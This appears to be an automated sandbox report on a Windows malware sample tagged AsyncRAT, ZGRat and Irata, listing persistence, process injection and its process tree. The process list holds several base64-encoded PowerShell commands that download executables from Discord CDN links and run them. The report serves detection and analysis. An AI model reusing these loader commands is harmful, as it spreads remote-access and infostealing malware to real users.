Malware Analysis Report

2025-01-19 06:34

Sample ID 231224-enhk2afcbq
Target eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe
SHA256 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5
Tags
asyncrat irata zgrat winlogoewg winlozb infostealer rat trojan upx persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5

Threat Level: Known bad

The file eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat irata zgrat winlogoewg winlozb infostealer rat trojan upx persistence

ZGRat

Irata

AsyncRat

Detect ZGRat V1

Irata payload

Async RAT payload

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Executes dropped EXE

Drops startup file

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious behavior: CmdExeWriteProcessMemorySpam

Enumerates processes with tasklist

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Modifies system certificate store

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-24 04:05

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-24 04:05

Reported

2023-12-24 04:07

Platform

win10v2004-20231215-en

Max time kernel

25s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe"

Signatures

AsyncRat

rat asyncrat

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\GRmgibjD38.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\iae4YiG8Cc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\lDE0E7gCkF.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\TgGaRENDNj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\DpVrSTzNdI.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\72MVhG3R68.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4920 set thread context of 2900 N/A C:\Users\Admin\AppData\Local\Temp\1HDUEZ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3936 set thread context of 4496 N/A C:\Users\Admin\AppData\Local\Temp\yZtqouRvwD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\3HDUEZ.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3952 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 4740 wrote to memory of 3872 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\72MVhG3R68.exe
PID 4740 wrote to memory of 3872 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\72MVhG3R68.exe
PID 3872 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Local\Temp\72MVhG3R68.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3872 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Local\Temp\72MVhG3R68.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3952 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 316 wrote to memory of 3840 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\GRmgibjD38.exe
PID 316 wrote to memory of 3840 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\GRmgibjD38.exe
PID 3952 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 3840 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\GRmgibjD38.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3840 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\GRmgibjD38.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3404 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\iae4YiG8Cc.exe
PID 3404 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\iae4YiG8Cc.exe
PID 3836 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\lDE0E7gCkF.exe
PID 3836 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\lDE0E7gCkF.exe
PID 3952 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\iae4YiG8Cc.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\iae4YiG8Cc.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\lDE0E7gCkF.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\lDE0E7gCkF.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3952 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 744 wrote to memory of 400 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\TgGaRENDNj.exe
PID 744 wrote to memory of 400 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\TgGaRENDNj.exe
PID 3952 wrote to memory of 4352 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 4352 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\TgGaRENDNj.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 400 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\TgGaRENDNj.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4352 wrote to memory of 4804 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\DpVrSTzNdI.exe
PID 4352 wrote to memory of 4804 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\DpVrSTzNdI.exe
PID 4500 wrote to memory of 3936 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\yZtqouRvwD.exe
PID 4500 wrote to memory of 3936 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\yZtqouRvwD.exe
PID 4500 wrote to memory of 3936 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\yZtqouRvwD.exe
PID 4804 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\DpVrSTzNdI.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\DpVrSTzNdI.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3376 wrote to memory of 4920 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\1HDUEZ.exe
PID 3376 wrote to memory of 4920 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\1HDUEZ.exe
PID 3376 wrote to memory of 4920 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\1HDUEZ.exe
PID 3936 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\yZtqouRvwD.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3936 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\yZtqouRvwD.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3936 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\yZtqouRvwD.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3936 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\yZtqouRvwD.exe C:\Windows\SysWOW64\cmd.exe
PID 3936 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\yZtqouRvwD.exe C:\Windows\SysWOW64\cmd.exe
PID 3936 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\yZtqouRvwD.exe C:\Windows\SysWOW64\cmd.exe
PID 4920 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\1HDUEZ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4920 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\1HDUEZ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4920 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\1HDUEZ.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4920 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\1HDUEZ.exe C:\Windows\SysWOW64\cmd.exe
PID 4920 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\1HDUEZ.exe C:\Windows\SysWOW64\cmd.exe
PID 4920 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\1HDUEZ.exe C:\Windows\SysWOW64\cmd.exe
PID 4920 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\1HDUEZ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4920 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\1HDUEZ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4920 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\1HDUEZ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3936 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\yZtqouRvwD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3936 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\yZtqouRvwD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3936 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\yZtqouRvwD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe

"C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\ivadZKpzcN.sln

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\72MVhG3R68.exe

C:\Users\Admin\AppData\Local\Temp\72MVhG3R68.exe

C:\Users\Admin\AppData\Local\Temp\72MVhG3R68.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAagBxACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADgANwA4ADYANwAwADQANAA0ADYANQA2ADEAOQAxADEANgAvADEAMQA4ADcAOAA2ADcANAAxADYAMwAxADUAOAAzADQANQA2ADgALwAyADIAZAAuAGUAeABlACcALAAgADwAIwBsAGYAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAYwBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAcgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEASABEAFUARQBaAC4AZQB4AGUAJwApACkAPAAjAGoAbgBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAZABqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBoAGwAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxAEgARABVAEUAWgAuAGUAeABlACcAKQA8ACMAbgB1AGoAIwA+AA=="

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\GRmgibjD38.exe

C:\Users\Admin\AppData\Local\Temp\GRmgibjD38.exe

C:\Users\Admin\AppData\Local\Temp\GRmgibjD38.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\iae4YiG8Cc.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\lDE0E7gCkF.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAcAB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAOAA3ADgANgA3ADAANAA0ADQANgA1ADYAMQA5ADEAMQA2AC8AMQAxADgANwA4ADYANwA0ADUANAA4ADMAMgAxADEANQA3ADcAMwAvAGQAbwBsAGwAbQBjAGMAcABpAGwALgBlAHgAZQAnACwAIAA8ACMAcgBhAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB1AGcAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAHUAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyAEgARABVAEUAWgAuAGUAeABlACcAKQApADwAIwByAGcAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAGQAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAawBoAHEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgBIAEQAVQBFAFoALgBlAHgAZQAnACkAPAAjAGoAcgBjACMAPgA="

C:\Users\Admin\AppData\Local\Temp\iae4YiG8Cc.exe

C:\Users\Admin\AppData\Local\Temp\iae4YiG8Cc.exe

C:\Users\Admin\AppData\Local\Temp\lDE0E7gCkF.exe

C:\Users\Admin\AppData\Local\Temp\lDE0E7gCkF.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\TgGaRENDNj.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAeQBlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADEAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAOAA3ADgANgA3ADAANAA0ADQANgA1ADYAMQA5ADEAMQA2AC8AMQAxADgANwA4ADYANwA0ADUAOQAwADYAOAAzADYANgA4ADUAOAAvAEgAeQB2AC4AZQB4AGUAJwAsACAAPAAjAGQAZQB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcABnAGsAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagB1AGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMwBIAEQAVQBFAFoALgBlAHgAZQAnACkAKQA8ACMAYQBjAGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBqAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAdgB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADMASABEAFUARQBaAC4AZQB4AGUAJwApADwAIwBuAGIAdgAjAD4A"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAagBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADEAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAOAA3ADgANgA3ADAANAA0ADQANgA1ADYAMQA5ADEAMQA2AC8AMQAxADgANwA4ADYANwA0ADgAMAAwADgAMQA4ADMAOAAxADgAMQAvAGUAYgBjAHoAZAAuAGUAeABlACcALAAgADwAIwBzAGgAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGQAagBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHUAaABsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQASABEAFUARQBaAC4AZQB4AGUAJwApACkAPAAjAHYAbgBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHMAYwBlACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHcAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA0AEgARABVAEUAWgAuAGUAeABlACcAKQA8ACMAdQBhAG0AIwA+AA=="

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\yZtqouRvwD.exe

C:\Users\Admin\AppData\Local\Temp\TgGaRENDNj.exe

C:\Users\Admin\AppData\Local\Temp\TgGaRENDNj.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\DpVrSTzNdI.exe

C:\Users\Admin\AppData\Local\Temp\DpVrSTzNdI.exe

C:\Users\Admin\AppData\Local\Temp\DpVrSTzNdI.exe

C:\Users\Admin\AppData\Local\Temp\yZtqouRvwD.exe

C:\Users\Admin\AppData\Local\Temp\yZtqouRvwD.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

